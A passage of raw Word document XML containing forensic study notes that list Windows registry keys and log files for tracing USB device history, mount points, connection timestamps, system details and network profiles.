        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Local\Microsoft\Windows\UsrClass.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED1C87" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="7763F2A1">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C46CC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USB Device Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5058F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USB Device Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181305C2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Enum\USBSTOR — USB storage devices enumeration (Vendor, Product, Serial #)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0AFE8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Enum\USB — USB devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF9153F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices — Device info including Class ID, Serial #, VID/PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0F40B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Volume and Drive Letter Tracking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F21E3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>MountedDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B13DDC6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Maps USB serial # to Drive Letters and Volume GUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FECBD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>EMDMgmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D99F994" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Present only if system drive is NOT SSD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708AAB0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Tracks ReadyBoost data and Volume Serial Numbers for USB devices (in decimal, convert to hex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288E898" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Useful to track device format history via multiple volume serial numbers per device serial #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FF413" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mountpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53431D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>User-specific mounts found at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34426A94" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NTUSER.DAT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF8EB2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Shows user that mounted the USB device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51124830" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USB Timestamps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568274A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>First connect, last connect, and removal times are stored under:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B81128" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Enum\USBSTOR\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Ven_Prod_Version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">\USB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>iSerial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Properties\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>GUID}\####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B770C1C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0064 = First Install (Win7 / 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2118938C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0066 = Last Connected (Win8+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E121A0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0067 = Last Removal (Win8+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3C0B4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Also found in setupapi.log and setupapi.dev.log (XP to Vista+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794A177" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Search logs for device serial # to find first time plugged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C033788" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32764C6D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>USBDeviceForensics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>WoanWare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> automates USB artifact analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5EBA46" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="505FF5C9">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D16F9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Miscellaneous Useful Registry Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27073EED" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System and Network Info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05D64C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>TimeZoneInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Time zone info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB1765" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD6C36" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\services\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Shares — List of open SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED2A63" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>FileSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F7FD87A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NtfsDisableLastAccessUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Usually 0x1 (access timestamps off by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0A939" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces — Network interface info and IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88C594" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Location Awareness (NLA) (Vista+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46107863" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Aggregates networks and assigns GUIDs for profiles (used by firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E73B98" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Keys to check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E5F097" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NetworkList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B9771" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Unmanaged and Managed network signatures (record gateway MAC, SSID, DNS suffix, GUID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD8D09" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NetworkList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Profiles\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>GUID} — Profile info with creation and last connected timestamps (stored as 128-bit UTC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65187AF1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HomeGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> — Network type and connection times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7731663C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>For XP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C0136" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>GUID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C37405E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Last write time indicates last connected time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD487D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Types Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2C44A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0x06 = Wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F145C5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0x17 = Broadband</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0E45D8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t>0x47 = Wireless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A60E9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="0C64FE0F">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884A4A2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
